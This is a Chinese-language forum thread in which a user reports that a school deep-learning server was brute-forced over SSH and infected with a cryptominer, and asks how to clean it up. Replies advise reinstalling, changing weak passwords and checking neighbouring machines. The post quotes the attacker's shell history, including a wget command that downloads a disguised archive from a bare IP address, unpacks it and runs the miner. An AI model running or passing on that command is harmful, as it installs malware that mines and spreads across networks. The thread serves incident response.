学校服务器感染挖矿病毒lasto.jpg

LiterMa · 发表于 2024-3-8 20:27

学校的深度学习服务器由于开过阿里云内网穿透被人暴力破解开了密码，然后被感染的服务器一直在局域网内不断尝试ssh爆破并安装挖矿脚本。
查看ubuntu操作history时发现了嫌疑人的的操作记录

[Asm] 纯文本查看 复制代码

 1979  2024-03-08 14:34:23wget -c 162.241.141.162/lasto.jpg;tar xzvf lasto.jpg;rm -rf lasto.jpg;cd .cache;./m lan
 1980  2024-03-08 14:34:23nvidia-smi
 1981  2024-03-08 14:34:23ps -x
 1982  2024-03-08 14:34:23nvidia-smi
 1983  2024-03-08 14:34:23sudo bash
 1984  2024-03-08 14:34:23nvidia-smi
 1985  2024-03-08 14:34:23exit

我按上面ip地址下载好了一份病毒样本在windows上进行解压分析，内容.cache如下：

火绒分析为病毒文件

我在服务器上删除了这几个文件。

服务器上的挖矿程序为查看定时任务时发现

cd到该.cache文件发现如下文件，下图中的upd文件已被我紧急删除防止挖矿的java名称程序启动。

upd文件内容如下：

现在我把这些文件全删除了，服务器是否还会有问题？接下来该做些什么？

a940284833 · 发表于 2024-3-9 20:56

maybe reinstalling OS

wutwse · 发表于 2024-3-14 08:54

常规操作，都是断网，然后重做系统，

FireMicROPEP1 · 发表于 2024-3-14 10:30

修改弱口令
排查该服务器网络可达的机器是否也感染病毒
排查感染服务器时间前后有变化的文件（比如服务项、SSH公钥等）

hacker2k · 发表于 2024-3-15 10:08

我自己的服务器有段时间也是被人挖矿，但是没种马

thekey001 · 发表于 2024-3-20 17:49

得找到初始入口，把入口给解决了，一般都是脚本扫描植入的，不找到初始入口后面肯定还会再中挖矿

4amxxxxxlu · 发表于 2024-3-25 16:10

楼主可以分享样本吗~感谢

爱飞的猫 · 发表于 2024-4-5 10:28

可以试试配个脚本定期上报显卡使用率和对应进程信息，然后隔一段时间看一下。

chenkeai深蓝 · 发表于 2024-4-11 13:26

楼主发个样本，我正在学习网络安全的溯源反制，借个样本学习学习

famoustang12888 · 发表于 2024-4-11 14:17

都是高手啊

帐号		自动登录	找回密码
密码			注册[Register]

学校服务器感染挖矿病毒lasto.jpg

个人中心